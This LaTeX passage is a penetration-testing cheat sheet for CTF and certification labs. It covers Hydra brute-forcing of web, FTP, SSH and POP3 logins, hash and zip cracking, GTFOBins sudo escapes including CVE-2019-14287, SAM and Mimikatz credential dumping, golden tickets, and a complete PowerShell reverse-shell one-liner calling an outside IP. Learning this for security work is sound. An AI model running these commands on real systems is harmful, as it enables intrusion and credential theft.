\SetRowColor{LightBackground} Hydra crack login page & \{\{fa-bolt\}\} Provide the full path like /index.php, otherwise it mostly won't work \{\{nl\}\}\{\{fa-bolt\}\} When providing the path, test /index.php to identify whether
PHP is running \{\{nl\}\}\{\{fa-bolt\}\} hydra 10.10.10.227 -l admin -P \seqsplit{/usr/share/wordlists/rockyou}.txt http-post-form '/admin/index.php:user=admin\&pass=\textasciicircum{}PASS\textasciicircum{}:Username or password invalid' -f \tn % Row Count 17 (+ 17) % Row 39 \SetRowColor{white} Sudo gives you permission to execute Scripts & \{\{fa-bolt\}\} Remove that script and replace with a shell \tn % Row Count 20 (+ 3) % Row 40 \SetRowColor{LightBackground} Brute force after you get usernames or password list hint & \{\{fa-bolt\}\} hydra, if you get usernames \tn % Row Count 23 (+ 3) % Row 41 \SetRowColor{white} Port Knocking : If you see numbers as hint might be port knocking & \{\{fa-bolt\}\} Knock on the ports mentioned to open hidden ports \{\{nl\}\}\{\{fa-bolt\}\} for x in 1 3 5; do nmap -Pn -{}-max-retries 0 -p \$x 10.10.63.86; done \{\{nl\}\}\{\{fa-bolt\}\} nmap -r -p1,3,5 10.10.17.17 \tn % Row Count 33 (+ 10) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Enumeration Checklist (cont)}} \tn % Row 42 \SetRowColor{LightBackground} SQL \& XSS Indicators & \{\{fa-bolt\}\} For XSS, target Text boxes and URL, XSS might also get triggered on another page, For SQL test URL like Id or login pages. 
\tn % Row Count 7 (+ 7) % Row 43 \SetRowColor{white} SMTP & \{\{fa-bolt\}\} Runs on Port 25, Nmap has scripts like -{}-script smtp-commands \&\& google search with hacktricks and hackingarticles for possible enumeration techniques \{\{nl\}\} \{\{fa-bolt\}\} \{\{link="https://www.jscape.com/blog/smtp-vs-imap-vs-pop3-difference"\}\}Understand the difference\{\{/link\}\} \tn % Row Count 22 (+ 15) % Row 44 \SetRowColor{LightBackground} 139 \& 445 SMB , for more refer hacktricks & \{\{fa-bolt\}\} Check null session, Shares list , Enum4linux \{\{nl\}\}\{\{fa-bolt\}\} enum4linux -a 10.0.2.19 \{\{nl\}\} Smbclient -L \textless{}ip\textgreater{} to list shares \&\& -N to force without password \&\& smbclient //\textless{}ip\textgreater{}/\textless{}share-name\textgreater{} \tn % Row Count 33 (+ 11) \hhline{>{\arrayrulecolor{DarkBackground}}--} \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{Enumeration and Understanding of the scenario are very important aspects. \newline Think if you need something like credentials is there any way to access them from current options available. 
\newline {\bf{CREDENTIALS}}} \tn \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Linux Commands}} \tn % Row 0 \SetRowColor{LightBackground} Command Name & Syntax \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} Vim Text Editor & \{\{fa-bolt\}\} i for insert \{\{fa-bolt\}\} esc to exit insert \{\{fa-bolt\}\} :wq to quit and save \{\{fa-bolt\}\} :\%d delete all lines \tn % Row Count 8 (+ 7) % Row 2 \SetRowColor{LightBackground} Hashcat (crack password hash) & \{\{fa-bolt\}\} hashcat -a 0 -m 500 hash \seqsplit{/root/Downloads/rockyou}.txt -{}-force\{\{nobreak\}\} \tn % Row Count 13 (+ 5) % Row 3 \SetRowColor{white} Transfer Files via Nc \& Base64 (move files) & \{\{nl\}\} \{\{fa-bolt\}\} On Victim : nc -nv 10.0.2.5 5555 \textless{} access.exe \{\{nl\}\} \{\{fa-bolt\}\} On Attacker : nc -nlvp 5555 \textgreater{} access.exe \{\{nl\}\} \{\{fa-bolt\}\} base64 \textless{}filename\textgreater{} \{\{nl\}\} \{\{fa-bolt\}\} Save the encoding in a file \{\{nl\}\} \{\{fa-bolt\}\} base64 -d \textless{}filename\_base64\_encoding\textgreater{} \tn % Row Count 27 (+ 14) % Row 4 \SetRowColor{LightBackground} Scp (secure copy files) & \{\{fa-bolt\}\} Want to receive files from target \{\{nl\}\} \{\{fa-bolt\}\} scp \seqsplit{username@remote:/file/to/send} /where/to/put \tn % Row Count 33 (+ 6) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Linux Commands (cont)}} \tn % Row 5 \SetRowColor{LightBackground} Gobuster (dir buster) & \{\{fa-bolt\}\} gobuster dir -u \seqsplit{http://10.10.203.157:3333/} -w \seqsplit{/usr/share/wordlists/dirb/common}.txt \{\{nobreak\}\} \tn % Row Count 6 (+ 6) % Row 6 \SetRowColor{white} Processes running (under which user) & ps aux \tn % Row Count 8 (+ 2) % Row 7 
\SetRowColor{LightBackground} SUID (set owner userId upon execution) binary & find / -perm -u=s -type f 2\textgreater{}/dev/null \{\{nl\}\} Instead of rwx -\textgreater{} rws. Example: the SUID bit is set on the passwd binary, as other users should be able to change their password but won't have direct access to the underlying file \{\{nl\}\} So it runs with root privileges \tn % Row Count 21 (+ 13)
% Row 8
\SetRowColor{white} Burp Suite (check acceptable file ext) & By sending the request to Intruder and then running a spider attack \{\{fa-bolt\}\} Check the response length to verify whether the extension is acceptable or not \{\{nl\}\} A Python script using the requests library can also be used \tn % Row Count 32 (+ 11)
\end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Linux Commands (cont)}} \tn % Row 9
\SetRowColor{LightBackground} Word count (count the no of lines in a file) & wc -l yourTextFile \tn % Row Count 3 (+ 3)
% Row 10
\SetRowColor{white} Whatweb & whatweb \textless{}ip\textgreater{} \{\{nl\}\} The WhatWeb tool is used to identify different web technologies used by the website.
\tn % Row Count 9 (+ 6)
% Row 11
\SetRowColor{LightBackground} Fim (view images from terminal) & fim \textless{}image\_name\textgreater{} \tn % Row Count 11 (+ 2)
% Row 12
\SetRowColor{white} Curl (change user agent, i.e.\ the browser type that renders content, and follow redirections) & curl -A "J" -L \seqsplit{"http://10.10.231.116"} \tn % Row Count 15 (+ 4)
% Row 13
\SetRowColor{LightBackground} Python server to transfer files from remote to local & python3 -m http.server \textless{}port\_no\textgreater{} and access it using the remote machine's ip:port \tn % Row Count 20 (+ 5)
% Row 14
\SetRowColor{white} Python server to transfer files from local to remote & wget http://\textless{}ur-ip\textgreater{}:\textless{}port\textgreater{}/\textless{}file\textgreater{} \tn % Row Count 23 (+ 3)
% Row 15
\SetRowColor{LightBackground} Extract zip & 7z e \textless{}zip\_name.zip\textgreater{} \tn % Row Count 24 (+ 1)
% Row 16
\SetRowColor{white} Crack Zip & locate zip2john \{\{nl\}\} zip2john \textless{}zipfile\textgreater{} \textgreater{} output.txt \{\{nl\}\} john output.txt \{\{nl\}\} fcrackzip -u backups.zip -D -p \seqsplit{/usr/share/wordlists/rockyou}.txt -v \tn % Row Count 32 (+ 8)
\end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Linux Commands (cont)}} \tn % Row 17
\SetRowColor{LightBackground} Move multiple files to a directory & mv file1 file2 folder\_name \tn % Row Count 2 (+ 2)
% Row 18
\SetRowColor{white} Fuzz directory & wfuzz -c -w common.txt -{}-sc 200 -u \seqsplit{"http://10.10.10.191/FUZZ.txt"} -t 100 \{\{nl\}\} wfuzz -z file,big.txt -d "breed=FUZZ" -u \seqsplit{http://shibes.xyz/api.php} \tn % Row Count 10 (+ 8)
% Row 19
\SetRowColor{LightBackground} Find flags .txt & find / -type f -name 'user.txt' 2\textgreater{}/dev/null \tn % Row Count 13 (+ 3)
% Row 20
\SetRowColor{white} Hydra (brute force http post form) & hydra -L usernames.txt -P passwords.txt 192.168.2.62
http-post-form "/dvwa/login.php:username=\textasciicircum{}USER\textasciicircum{}\&password=\textasciicircum{}PASS\textasciicircum{}\&Login=Login:Login Failed" \{\{nl\}\} \{\{fa-bolt\}\} Specify the error at login failed \tn % Row Count 23 (+ 10) % Row 21 \SetRowColor{LightBackground} Hydra (brute force FTP) & hydra -l ftpuser -P passlist ftp://10.10.50.55 \tn % Row Count 26 (+ 3) % Row 22 \SetRowColor{white} FTP bruteforce & hydra -l chris -P \seqsplit{/usr/share/wordlists/rockyou}.txt -vV ftp://10.10.91.104 \tn % Row Count 30 (+ 4) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Linux Commands (cont)}} \tn % Row 23 \SetRowColor{LightBackground} POP3 bruteforce & \{\{fa-bolt\}\} hydra -l "boris" -P \seqsplit{/usr/share/wordlists/fasttrack}.txt -f 10.10.186.225 -s 55007 pop3 -V \tn % Row Count 5 (+ 5) % Row 24 \SetRowColor{white} John the ripper (crack ssh) VIA (private key pass bruteforce) & \{\{fa-bolt\}\} python \seqsplit{/usr/share/john/ssh2john}.py codes \textgreater{} crack.txt \{\{nl\}\} \{\{fa-bolt\}\} john -{}-wordlist=/root/Downloads/rockyou.txt crack.txt \tn % Row Count 12 (+ 7) % Row 25 \SetRowColor{LightBackground} ssh (login through private key) & \{\{fa-bolt\}\} ssh -i codes david@10.10.10.165 -p 22 \tn % Row Count 15 (+ 3) % Row 26 \SetRowColor{white} SSH bruteforce for password & \{\{fa-bolt\}\} hydra -f -l john -P list ssh://10.10.24.200 \tn % Row Count 18 (+ 3) % Row 27 \SetRowColor{LightBackground} Bruteforce JPG for hidden data (steghide pass) & \{\{fa-bolt\}\} stegcracker file list.txt \tn % Row Count 21 (+ 3) % Row 28 \SetRowColor{white} TELNET interacting with POP3 & \{\{fa-bolt\}\} Connect to the mail server using Telnet with the IP or DNS name of the server on port 110 \{\{nl\}\}\{\{fa-bolt\}\} \{\{link="https://www.vircom.com/blog/quick-guide-of-pop3-command-line-to-type-in-telnet/"\}\}TELNET 
commands\{\{/link\}\} \tn % Row Count 33 (+ 12) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Linux Commands (cont)}} \tn % Row 29 \SetRowColor{LightBackground} PNG magic number \& Hexedit & \{\{fa-bolt\}\} 89 50 4E 47 0D 0A 1A 0A \{\{nl\}\}\{\{fa-bolt\}\}hexedit \textless{}file\textgreater{} \{\{nl\}\}\{\{fa-bolt\}\} hexedit ctrl+x - to save \tn % Row Count 6 (+ 6) % Row 30 \SetRowColor{white} Mysql cheatsheet & \{\{fa-bolt\}\} \{\{link="http://g2pc1.bu.edu/\textasciitilde{}qzpeng/manual/MySQL\%20Commands.htm"\}\} MySQL Commands\{\{/link\}\} \{\{nl\}\} \{\{fa-bolt\}\} Use ; to terminate the mysql line \tn % Row Count 14 (+ 8) % Row 31 \SetRowColor{LightBackground} Find a specific file with readable permission & \{\{fa-bolt\}\} find / -type f -readable 2\textgreater{}/dev/null | grep README.txt \tn % Row Count 18 (+ 4) % Row 32 \SetRowColor{white} Sudo -l execution & \{\{fa-bolt\}\} (sly) /bin/cat \seqsplit{/home/sly/README.txt} \{\{nl\}\}\{\{fa-bolt\}\} sudo -u sly /bin/cat \seqsplit{/home/sly/README.txt} \{\{nl\}\}\{\{fa-bolt\}\} So you can see the user was able to execute that command. 
We have to use sudo, specifying \textless{}usr\textgreater{} \textless{}binary path\textgreater{} \textless{}file\textgreater{}, to execute it \tn % Row Count 31 (+ 13)
\end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Linux Commands (cont)}} \tn % Row 33
\SetRowColor{LightBackground} Nmap scanning working & \{\{fa-bolt\}\} if you run nmap -sC -sV -Pn ip you can see the result; if you specifically pass -p 1-100, it will show their info, because they are all open \tn % Row Count 8 (+ 8)
% Row 34
\SetRowColor{white} To only grab banners & \{\{fa-bolt\}\} nmap -p 1-100 \textless{}IP\textgreater{} -{}-script banner \{\{nl\}\}\{\{fa-bolt\}\}Telnet is a communication tool; it gets the banner or the protocol info: if the service is HTTP it shows HTTP info, if it is SSH it shows the SSH RSA info \tn % Row Count 19 (+ 11)
% Row 35
\SetRowColor{LightBackground} Escape shells via programming & \{\{fa-bolt\}\} \{\{link="https://jc01.ninja/ctf/privesc-playground/"\}\}Escaping a shell via a programming language, like ruby irb(main)\{\{/link\}\} \tn % Row Count 26 (+ 7)
\hhline{>{\arrayrulecolor{DarkBackground}}--} \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{\seqsplit{https://mzfr.github.io/linux-priv-esc} \newline \newline https://linuxize.com/post/how-to-use-linux-ftp-command-to-transfer-files/ \newline \newline https://www.hostingmanual.net/zipping-unzipping-files-unix/} \tn \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{3.68 cm} x{4.32 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{GTFOBins}} \tn % Row 0
\SetRowColor{LightBackground} Usage & Syntax \tn % Row Count 1 (+ 1)
% Row 1
\SetRowColor{white} Vim Text Editor & \seqsplit{https://gtfobins.github.io/gtfobins/vim/} \tn % Row Count 3 (+ 2)
% Row 2
\SetRowColor{LightBackground} Service Exploitation & \{\{fa-bolt\}\} Exploiting
any service which is running as root \{\{nl\}\}\{\{fa-bolt\}\} Also provide the file path to the service's executable \tn % Row Count 10 (+ 7) % Row 3 \SetRowColor{white} To exploit a service & Execute it for example \textless{}path\_to\_the\_service\textgreater{}-\textgreater{} \{\{nl\}\}\{\{fa-bolt\}\} /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service \{\{nl\}\}\{\{fa-bolt\}\} journalctl pages its output through less; once the pager is open type !sh to get a shell as root (the output must be longer than the terminal, otherwise the pager never starts) \{\{nl\}\}\{\{fa-bolt\}\} You can get this from GTFOBins but need to find out the exact path allowed by sudo -l \tn % Row Count 20 (+ 10) % Row 4 \SetRowColor{LightBackground} /systemctl (SUID bit set) & \{\{fa-bolt\}\}service is a "high-level" command used to start, restart, stop and query the status of services in different Unixes and Linuxes. \{\{nl\}\}\{\{fa-bolt\}\} service is adequate for basic service management, while calling systemctl directly gives greater control. \{\{nl\}\}\{\{fa-bolt\}\} A SUID systemctl lets any logged-in user write a unit file and have it run as root! \tn % Row Count 38 (+ 18) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{3.68 cm} x{4.32 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{GTFOBins (cont)}} \tn % Row 5 \SetRowColor{LightBackground} Sudo -l & sudo -l shows exactly which commands (and as which users) you are authorized to run \tn % Row Count 3 (+ 3) % Row 6 \SetRowColor{white} (ALL, !root) NOPASSWD: /usr/bin/vi & (ALL, !root) means "as any user except root". On unpatched sudo (CVE-2019-14287) that exclusion can be bypassed because user id -1 is converted to 0: \{\{nl\}\}\{\{fa-bolt\}\} sudo -u\#-1 \textless{}path\_where\_user\_can\_execute\_sudo\_command\textgreater{} \tn % Row Count 10 (+ 7) % Row 7 \SetRowColor{LightBackground} If sudo -l specifies Vim & \{\{fa-bolt\}\} Press esc, then :! to run a system command from inside vim, and give it sh (:!sh) -{}- the shell inherits sudo's privileges \tn % Row Count 16 (+ 6) \hhline{>{\arrayrulecolor{DarkBackground}}--} \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{GTFOBins is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions. 
\newline \newline The project collects legitimate functions of Unix binaries that can be abused to break out of restricted shells, escalate or maintain elevated privileges, transfer files, spawn bind and reverse shells, and facilitate other post-exploitation tasks.} \tn \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Windows Enumeration}} \tn % Row 0 \SetRowColor{LightBackground} Command & Usage \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} Biggest Enumeration Hint & \{\{fa-bolt\}\} This is going to sound like I'm being disingenuous, but you need to learn how to figure things out. Each machine might require a tool you haven't even heard of yet, but you have to figure that part out. Knowing what and how to Google is arguably the most valuable skill. \tn % Row Count 15 (+ 14) % Row 2 \SetRowColor{LightBackground} Hint - Users & \{\{fa-bolt\}\} Names are important! 
Any name found during enumeration might be a subdomain, a username or a password -{}- read everything and write them down \tn % Row Count 20 (+ 5) % Row 3 \SetRowColor{white} Hint - Finding the right file & \{\{fa-bolt\}\} The service found at the start of the box can later be checked for config files that contain usernames or passwords \tn % Row Count 26 (+ 6) % Row 4 \SetRowColor{LightBackground} Github - working & \{\{fa-bolt\}\} Create branch \{\{fa-bolt\}\} Now push file into that branch \{\{fa-bolt\}\} Click on the uploaded file and PULL request \{\{fa-bolt\}\} Complete pull request is same as Commit \{\{fa-bolt\}\} Approve and Complete the Merge \tn % Row Count 37 (+ 11) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Windows Enumeration (cont)}} \tn % Row 5 \SetRowColor{LightBackground} Active Directory & \{\{fa-bolt\}\} TryHackMe Room \{\{fa-bolt\}\} A Windows Domain allows management of large computer networks \{\{fa-bolt\}\} They use a Windows server called a DC (domain controller) \{\{fa-bolt\}\} A DC is any server that has the Active Directory Domain Services role \{\{fa-bolt\}\} DCs respond to authentication requests across the domain \{\{fa-bolt\}\} DCs have the tools AD (Active Directory) and GP (Group Policy) \{\{fa-bolt\}\} AD contains objects and OUs (Organizational Units) \{\{fa-bolt\}\} GP contains GPOs (Group Policy Objects) that manage settings for AD objects \tn % Row Count 28 (+ 28) % Row 6 \SetRowColor{white} Netbios port 137 & \{\{fa-bolt\}\} HackTricks enumeration \tn % Row Count 30 (+ 2) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Windows Enumeration (cont)}} \tn % Row 7 \SetRowColor{LightBackground} SMB port 139 & \{\{fa-bolt\}\} smbclient -L \textless{}ip\textgreater{} - lists shares (share name and type); add -N to try an anonymous/null session without a password \tn % Row Count 5 (+ 5) % Row 8 
\SetRowColor{white} SVN PORT NO - 3690 and its simply Version Tracking With Subversion (SVN) & \{\{fa-bolt\}\} First view the log \{\{fa-bolt\}\} svn log svn://worker.htb/ \{\{nl\}\} \{\{fa-bolt\}\} Now you can view the difference between those commits \{\{fa-bolt\}\} svn diff svn://htb/ -r 2 \tn % Row Count 14 (+ 9) % Row 9 \SetRowColor{LightBackground} Subversion Commands & \seqsplit{http://www.yolinux.com/TUTORIALS/Subversion.html\#SVNPROPERTIES} \tn % Row Count 18 (+ 4) % Row 10 \SetRowColor{white} SVN & \{\{fa-bolt\}\} Subversion cannot find a proper .svn directory in there. \tn % Row Count 22 (+ 4) % Row 11 \SetRowColor{LightBackground} Reverse shells & \seqsplit{https://hackersinterview}.com/oscp/reverse-shell-one-liners-oscp-cheatsheet/ \tn % Row Count 26 (+ 4) % Row 12 \SetRowColor{white} Powershell reverse shell & powershell -nop -c "\$client = New-Object \seqsplit{System.Net.Sockets.TCPClient('192.168.1.2'},4444);\$stream = \$client.GetStream();{[}byte{[}{]}{]}\$bytes = 0..65535|\%\{0\};while((\$i = \seqsplit{\$stream.Read(\$bytes}, 0, \$bytes.Length)) -ne 0)\{;\$data = (New-Object -TypeName \seqsplit{System.Text.ASCIIEncoding).GetString(\$bytes},0, \$i);\$sendback = (iex \$data 2\textgreater{}\&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '\textgreater{} ';\$sendbyte = ({[}text.encoding{]}::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()\};\$client.Close()" \tn % Row Count 53 (+ 27) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Windows Enumeration (cont)}} \tn % Row 13 \SetRowColor{LightBackground} Windows interactive shell (ASPX Shell by LT) & \seqsplit{https://github.com/xl7dev/WebShell/blob/master/Aspx/ASPX\%20Shell.aspx} \tn % Row Count 4 (+ 4) % Row 14 \SetRowColor{white} Dumping passwords and hashes on windows & \{\{fa-bolt\}\} This most probably requires 
administrative permissions (local Administrator or SYSTEM). Windows stores local account password hashes in the SAM - Security Account Manager. Hash formats differ depending on the operating system version. \{\{nl\}\}\{\{fa-bolt\}\} There are 2 hash formats - LM (LAN Manager, weak, disabled by default from Windows Vista onward) and NT/NTLM (NT LAN Manager, what modern systems store). \{\{nl\}\}\{\{fa-bolt\}\} \tn % Row Count 22 (+ 18) % Row 15 \SetRowColor{LightBackground} Credential Dumping: SAM (tools) & \{\{fa-bolt\}\} The Security Accounts Manager (SAM) is a registry hive present in Windows NT and every later version. It stores users' passwords in a hashed format (LM hash and/or NT hash). A hash is one-way, but the NT hash is unsalted, so it cracks quickly with a wordlist (see the hashcat row) and can be reused directly in pass-the-hash attacks. \{\{nl\}\}\{\{fa-bolt\}\} The SAM hive lives in C:\textbackslash{}Windows\textbackslash{}System32\textbackslash{}config and is mounted in the registry under HKEY\_LOCAL\_MACHINE\textbackslash{}SAM. Caveat: the file is locked by the kernel while Windows runs and the registry key is only readable as SYSTEM, so dumping needs elevated privileges; the hashes are also encrypted with the boot key, so the SYSTEM hive is needed alongside SAM to decrypt them. \{\{nl\}\}\{\{fa-bolt\}\} Windows 7 - SamDump2, PwDump7, Metasploit framework \{\{nl\}\}\{\{fa-bolt\}\} Windows 10 - Mimikatz, Impacket, Metasploit Framework - Hashdump and \seqsplit{load\_kiwi(mimikatz)} \{\{nl\}\}\{\{fa-bolt\}\} The Registry is essentially a database. Its information is stored on disk for the most part, though dynamic information also exists in the computer's memory \tn % Row Count 67 (+ 45) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Windows Priv. Esc. 
|| Metasploit Module}} \tn % Row 0 \SetRowColor{LightBackground} Name & Usage \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} Microsoft Remote Desktop (MSRDP) & Port no - 3389 \tn % Row Count 3 (+ 2) % Row 2 \SetRowColor{LightBackground} Local Security Authority Subsystem Service & \{\{fa-bolt\}\} lsass service \{\{nl\}\}\{\{fa-bolt\}\} The service responsible for authentication within Windows. \{\{nl\}\}\{\{fa-bolt\}\} We generally infect a process with the migrate command in metasploit to infect a process that can communicate with lsass.exe and has permissions that are needed to interact \tn % Row Count 18 (+ 15) % Row 3 \SetRowColor{white} To exploit lsass we need to be \{\{fa-bolt\}\}Same architecture (living in) \{\{fa-bolt\}\} Same permissions & \{\{fa-bolt\}\}In order to interact with lsass we need to be 'living in' a process that is the same architecture as the lsass service (x64 in the case of this machine) and a process that has the same permissions as lsass. \tn % Row Count 29 (+ 11) % Row 4 \SetRowColor{LightBackground} Printer service & \{\{fa-bolt\}\}spoolsv.exe \{\{nl\}\}\{\{fa-bolt\}\} The printer spool service \tn % Row Count 33 (+ 4) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Windows Priv. Esc. || Metasploit Module (cont)}} \tn % Row 5 \SetRowColor{LightBackground} Living in as a process & \{\{fa-bolt\}\} Often when we take over a running program we ultimately load another shared library into the program (a dll) which includes our malicious code. From this, we can spawn a new thread that hosts our shell. 
\tn % Row Count 11 (+ 11) % Row 6 \SetRowColor{white} msfconsole \textgreater{}\textgreater{} search \textless{}Program/Process\textgreater{} & Fire up msfconsole terminal and search for vulnerable exploit of a program or process \tn % Row Count 16 (+ 5) % Row 7 \SetRowColor{LightBackground} Select a exploit & \{\{fa-bolt\}\} Select using \#use \textless{}no\textgreater{}\{\{fa-bolt\}\} Remeber to use \#search options command and set them accordingly \tn % Row Count 22 (+ 6) % Row 8 \SetRowColor{white} Fire the exploit & \{\{fa-bolt\}\}\#run them after setting up options \tn % Row Count 25 (+ 3) % Row 9 \SetRowColor{LightBackground} Metasploit command center & \{\{fa-bolt\}\}\#getuid (user-id)\{\{fa-bolt\}\}\#sysinfo \{\{fa-bolt\}\}\#getprivs \{\{fa-bolt\}\}\#migrate -N PROCESS\_NAME \tn % Row Count 31 (+ 6) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Windows Priv. Esc. || Metasploit Module (cont)}} \tn % Row 10 \SetRowColor{LightBackground} Local\_exploit V/S Remote\_exploit & \{\{fa-bolt\}\} A remote exploit works over a network and exploits the security vulnerability without any prior access to the vulnerable system. A local exploit requires prior access to the vulnerable system and usually increases the privileges of the person running the exploit past those granted by the system administrator. \tn % Row Count 17 (+ 17) % Row 11 \SetRowColor{white} Local\_exploit (metasploit) & \{\{fa-bolt\}\}run \seqsplit{post/multi/recon/local\_exploit\_suggester} \{\{nl\}\}\{\{fa-bolt\}\} Results for potential escalation exploits. 
\{\{nl\}\}\{\{fa-bolt\}\} Local exploits require an existing session (set SESSION \textless{}id\textgreater{}) \tn % Row Count 27 (+ 10) % Row 12 \SetRowColor{LightBackground} Background a session (some privilege) & \{\{fa-bolt\}\}\#background \{\{nl\}\}\{\{fa-bolt\}\} This provides us with a session number which can be used in combination with another exploit to escalate privileges \tn % Row Count 35 (+ 8) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Windows Priv. Esc. || Metasploit Module (cont)}} \tn % Row 13 \SetRowColor{LightBackground} Mimikatz (password dumping tool) & \{\{fa-bolt\}\}\#load kiwi (kiwi is the Meterpreter extension that wraps Mimikatz) \{\{nl\}\}\{\{fa-bolt\}\} It adds extra commands; use \#help to list them \{\{nl\}\}\{\{fa-bolt\}\} Dumping credentials needs SYSTEM and a process of the same architecture as lsass (see the lsass rows) \tn % Row Count 9 (+ 9) % Row 14 \SetRowColor{white} Mimikatz allows us to create what's called a `golden ticket`, allowing us to authenticate anywhere with ease. & \{\{fa-bolt\}\}golden\_ticket\_create \{\{nl\}\}\{\{fa-bolt\}\}Golden ticket attacks are a function within Mimikatz which abuses a component of Kerberos (the authentication system in Windows domains), the ticket-granting ticket. In short, golden ticket attacks allow us to maintain persistence and authenticate as any user on the domain. \{\{nl\}\}\{\{fa-bolt\}\} Caveat: forging one requires the krbtgt account's NT hash and the domain SID, i.e. you already need Domain Admin / DC-level access -{}- it is a persistence technique, not an initial escalation. \tn % Row Count 26 (+ 17) % Row 15 \SetRowColor{LightBackground} Windows NTLM hash crack & hashcat -a 0 -m 1000 crack.hash \seqsplit{/usr/share/wordlists/rockyou}.txt (-m 1000 is the NT hash; feed it the NT half of an LM:NT pair) \tn % Row Count 30 (+ 4) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Privilege escalation}} \tn % Row 0 \SetRowColor{LightBackground} Usage & Syntax \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} Fast Linux Priv. 
